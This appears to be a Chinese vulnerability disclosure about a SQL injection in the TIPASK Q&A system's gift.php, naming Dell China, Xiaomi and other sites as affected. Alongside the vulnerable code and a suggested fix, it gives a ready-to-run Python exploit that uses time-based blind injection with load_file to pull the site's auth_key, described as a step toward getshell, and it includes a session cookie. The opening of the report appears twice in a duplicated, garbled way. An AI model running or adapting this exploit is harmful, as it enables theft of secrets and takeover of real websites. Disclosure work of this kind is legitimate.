### 简要描述: TIPASK问答系统SQL注入三(影响天极网、戴尔中国、WPS office、小米等网站) ### 详细说明: 部分案例: [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 通过源代码发现/control/gift.php存在注入,部分代码如下 ``` function onadd() { if(isset($this->post['realname'])) { $realname = $this->post['realname']; $email = $this->post['email']; $phone = $this->post['phone']; $addr = $this->post['addr']; $postcode = $this->post['postcode']; $qq = $this->post['qq']; $notes = $this->post['notes']; $gid = $this->post['gid']; $param = array(); if(''==$realname || ''==$email || ''==$phone||''==$addr||''==$postcode) { $this->message("为了准确联系到您,真实姓名、邮箱、联系地址(邮编)、电话不能为空!",'gift/default'); } if (!preg_match("/^[a-z'0-9]+([._-][a-z'0-9]+)*@([a-z0-9]+([._-][a-z0-9]+))+$/",$email)) { $this->message("邮件地址不合法!",'gift/default'); } if(($this->user['email'] != $email) &&...
### 简要描述: TIPASK问答系统SQL注入三(影响天极网、戴尔中国、WPS office、小米等网站) ### 详细说明: 部分案例: [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 通过源代码发现/control/gift.php存在注入,部分代码如下 ``` function onadd() { if(isset($this->post['realname'])) { $realname = $this->post['realname']; $email = $this->post['email']; $phone = $this->post['phone']; $addr = $this->post['addr']; $postcode = $this->post['postcode']; $qq = $this->post['qq']; $notes = $this->post['notes']; $gid = $this->post['gid']; $param = array(); if(''==$realname || ''==$email || ''==$phone||''==$addr||''==$postcode) { $this->message("为了准确联系到您,真实姓名、邮箱、联系地址(邮编)、电话不能为空!",'gift/default'); } if (!preg_match("/^[a-z'0-9]+([._-][a-z'0-9]+)*@([a-z0-9]+([._-][a-z0-9]+))+$/",$email)) { $this->message("邮件地址不合法!",'gift/default'); } if(($this->user['email'] != $email) && $this->db->fetch_total('user'," email='$email' ")) { $this->message("此邮件地址已经注册!",'gift/default'); } $gift = $_ENV['gift']->get($gid); if($this->user['credit2']<$gift['credit']) { $this->message("抱歉!您的财富值不足不能兑换该礼品!",'gift/default'); } $_ENV['user']->update_gift($this->user['uid'],$realname,$email,$phone,$qq); $_ENV['gift']->addlog($this->user['uid'],$gid,$this->user['username'],$realname,$this->user['email'],$phone,$addr,$postcode,$gift['title'],$qq,$notes,$gift['credit']); $this->credit($this->user['uid'],0,-$gift['credit']);//扣除财富值 $this->message("礼品兑换申请已经送出等待管理员审核!","gift/default"); } } ``` $gid = $this->post['gid']; $gid 参数直接取自 POST,未做任何过滤(例如未用 intval 强制转为整数)便传入 $_ENV['gift']->get($gid),造成了SQL注入漏洞;修复时应在使用前将 $gid 强制转为整数,并在数据层对拼入 SQL 的值改用参数化查询。同样,为了无限制getshell,依然还是获取加密的auth_key,直接上Exp: ``` #/usr/bin/pytyon import urllib import urllib2 from time import * def inject(url,payload): post = urllib.urlencode({ 'gid':payload, 'realname':'testtest', 'email':'email@qq.com', 'phone':'15800000000', 'addr':'111111', 'postcode':'22222' }) header = 
{'Cookie':'tp_auth=70349FVn7tDasEWTHDyi6y7itpKIFhjiQ66UaK7mwIB31Rc7E0MttS8v7QfbBy1yGmiHDNptr3sjTC7RyXhM'} req = urllib2.Request(url,post,header) start_time = time() resp = urllib2.urlopen(req) flag = int(time()-start_time) return flag def exploit(): result = "" url = 'http://127.0.0.1/tipask/?gift/add.html' for i in range(4677,4741): for num in range(32,127): flag= inject(url,"2) and if(ord(substring((select/**/load_file(0x443A5C417070536572765C7777775C74697061736B5C646174615C63616368655C73657474696E672E706870)),%s,1))=%s,BENCHMARK(5000000,md5(1)),null)#"%(i,num)) if flag>0: mstr = i - 4676 result = result+chr(num) print 'auth_key =>'+result break if __name__=="__main__": exploit() ``` 结果如下: [<img src="https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg)